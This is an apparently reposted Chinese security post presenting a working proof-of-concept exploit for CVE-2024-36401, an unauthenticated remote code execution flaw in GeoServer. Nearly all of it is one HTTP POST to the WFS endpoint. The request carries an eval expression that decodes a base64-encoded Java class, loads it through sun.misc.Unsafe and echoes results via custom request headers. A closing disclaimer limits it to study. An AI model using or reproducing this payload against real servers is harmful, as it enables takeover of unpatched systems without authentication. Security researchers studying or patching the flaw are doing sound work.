Geoserver表达式注入致远程代码执行漏洞(CVE-2024-36401),攻击者无需认证即可利用该漏洞获取服务器权限。
回显poc:
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8080Last-Modified-A:pocLast-Modified-B:forgeoserverContent-Type: application/xmlContent-Length: 4901<wfs:GetPropertyValue service = 'WFS' version = '2.0.0' xmlns:topp = 'http://www.openplans.org/topp' xmlns:fes = 'http://www.opengis.net/fes/2.0' xmlns:wfs = 'http://www.opengis.net/wfs/2.0' > <wfs:Query typeNames = 'sf:archsites' /> <wfs:valueReference> eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),' var str="yv66vgAAADQApwgAWggAWwoAGQBcCgArAF0KAF4AXwgAYAoAFwBhCABBCgAXAGIKAGMAZAoAYwBlCABmCABFCABnCABoCgBpAGoKAGkAawoAGQBsCgAXAG0IAG4KAB4AbwgAcAcAcQoAFwByBwBzCgB0AHUIAHYIAHcIAHgHAHkKACsAegoAKwB7CAB8BwB9BwB+CgAjAFwKACMAfwoAIwCACgAiAIEKACIAggoAIgCDBwCEBwCFAQAQZ2V0UmVxSGVhZGVyTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMb3JnL2V4YW1wbGUvRmlsZVV0aWxzOwEAEWdldFJlcUhlYWRlck5hbWUyAQAGPGluaXQ+AQADKClWAQADcnVuAQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQABaQEAAUkBAAZ3cml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAx0aHJlYWRMb2NhbHMBAA50aHJlYWRMb2NhbE1hcAEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAKdGFibGVGaWVsZAEABXRhYmxlAQAFZW50cnkBAAp2YWx1ZUZpZWxkAQAOaHR0cENvbm5lY3Rpb24BAAtodHRwQ2hhbm5lbAEACHJlc3BvbnNlAQAHcmVxdWVzdAEAAWEBABJMamF2YS9sYW5nL1N0cmluZzsBAAFiAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQANU3RhY2tNYXBUYWJsZQcAhQcAhgcAhwcAcwcAcQcAhAEAClNvdXJjZUZpbGUBAA5GaWxlVXRpbHMuamF2YQEAD0xhc3QtTW9kaWZpZWQtQQEAD0xhc3QtTW9kaWZpZWQtQgwANAA1DAA2ADUHAIYMAIgAiQEAEGphdmEubGFuZy5UaHJlYWQMAIoAiwwAjACNBwCHDACOAI8MAJAAkQEAJGphdmEubGFuZy5UaHJlYWRMb2NhbCRUaHJlYWRMb2NhbE1hcAEAKmphdmEubGFuZy5UaHJlYWRMb2NhbCRUaHJlYWRMb2NhbE1hcCRFbnRyeQEABXZhbHVlBwCSDACTAJQMAJAAlQwAlgCXDACYAC0BACdvcmcuZWNsaXBzZS5qZXR0eS5zZXJ2ZXIuSHR0cENvbm5lY3Rpb24MAJkAmgEADmdldEh0dHBDaGFubmVsAQAPamF2YS9sYW5nL0NsYXNzDACbAJwBABBqYXZhL2xhbmcvT2JqZWN0BwCdDACeAJ8BAAtnZXRSZXNwb25zZQEACmdldFJlcXVlc3QBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nDAAsAC0MADMALQEACWdldFdyaXRlcgEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAoAChDACiAC0MAKMApAwApQA1DACmADUBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAVb3JnL2V4YW1wbGUvRmlsZVV0aWxzAQAQamF2YS9sYW5nL1RocmVhZAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAF2phdmEvbGFuZy9yZWZsZWN0L0FycmF5AQAJZ2V0TGVuZ3RoAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJAQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHZ2V0TmFtZQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQAhACsAGQAAAAAABAACACwALQABAC4AAAAtAAEAAQAAAAMSAbAAAAACAC8AAAAGAAEAAAAQADAAAAAMAAEAAAADADEAMgAAAAIAMwAtAAEALgAAAC0AAQABAAAAAxICsAAAAAIALwAAAAYAAQAAABMAMAAAAAwAAQAAAAMAMQAyAAAAAQA0ADUAAQAuAAAAOwABAAEAAAAJKrcAAyq3AASxAAAAAgAvAAAADgADAAAAFQAEABYACAAXADAAAAAMAAEAAAAJADEAMgAAAAIANgA1AAEALgAAAzEABgAQAAABfLgABUwSBrgABxIItgAJTSwEtgAKLCu2AAtOEgy4AAc6BBkEEg22AAk6BRkFBLYAChkFLbYACzoGEg64AAc6BxkHEg+2AAk6CBkIBLYACgE6CQM2ChUKGQa4ABCiADgZBhUKuAAROgsZC8YAJBkIGQu2AAs6CRkJxgAWGQm2ABK2ABMSFLYAFZkABqcACYQKAaf/xBkJtgASEhYDvQAXtgAYGQkDvQAZtgAaOgoZCrYAEhIbA70AF7YAGBkKA70AGbYAGjoLGQq2ABISHAO9ABe2ABgZCgO9ABm2ABo6DBkMtgASEh0EvQAXWQMSHlO2ABgZDAS9ABlZAyq3AB9TtgAawAAeOg0ZDLYAEhIdBL0AF1kDEh5TtgAYGQwEvQAZWQMqtwAgU7YAGsAAHjoOGQ3GAEcZDsYAQhkLtgASEiEDvQAXtgAYGQsDvQAZtgAawAAiOg8ZD7sAI1m3ACQZDbYAJRkOtgAltgAmtgAnGQ+2ACgZD7YAKacABEyxAAEAAAF3AXoAKgAEAC8AAACCACAAAAAbAAQAHAAPAB0AFAAeABoAHwAhACAAKgAhADAAIgA4ACMAPwAkAEgAJQBOACYAUQAoAF4AKQBnACoAbAArAHUALACKAC0AjQAoAJMAMgCsADMAxQA0AN4ANQEGADYBLgA4ATgAOQFUADoBbQA7AXIAPAF3AD8BegA+AXsAQQAwAAAAtgASAGcAJgA3ADgACwBUAD8AOQA6AAoBVAAjADsAPAAPAAQBcwA9AD4AAQAPAWgAPwBAAAIAGgFdAEEAOAADACEBVgBCAEMABAAqAU0ARABAAAUAOAE/AEUAOAAGAD8BOABGAEMABwBIAS8ARwBAAAgAUQEmAEgAOAAJAKwAywBJADgACgDFALIASgA4AAsA3gCZAEsAOAAMAQYAcQBMAE0ADQEuAEkATgBNAA4AAAF8ADEAMgAAAE8AAAAWAAIAIQFWAEIAUAAEAD8BOABGAFAABwBRAAAAOwAG/wBUAAsHAFIHAFMHAFQHAFUHAFYHAFQHAFUHAFYHAFQHAFUBAAA4+gAF/wDjAAEHAFIAAEIHAFcAAAEAWAAAAAIAWQ=="; var bt; try { bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str); } catch (e) { bt = java.util.Base64.getDecoder().decode(str); } var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); theUnsafe.setAccessible(true); unsafe = theUnsafe.get(null); unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance(); ') </wfs:valueReference> </wfs:GetPropertyValue>
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):GeoServer(CVE-2024-36401)命令执行回显POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论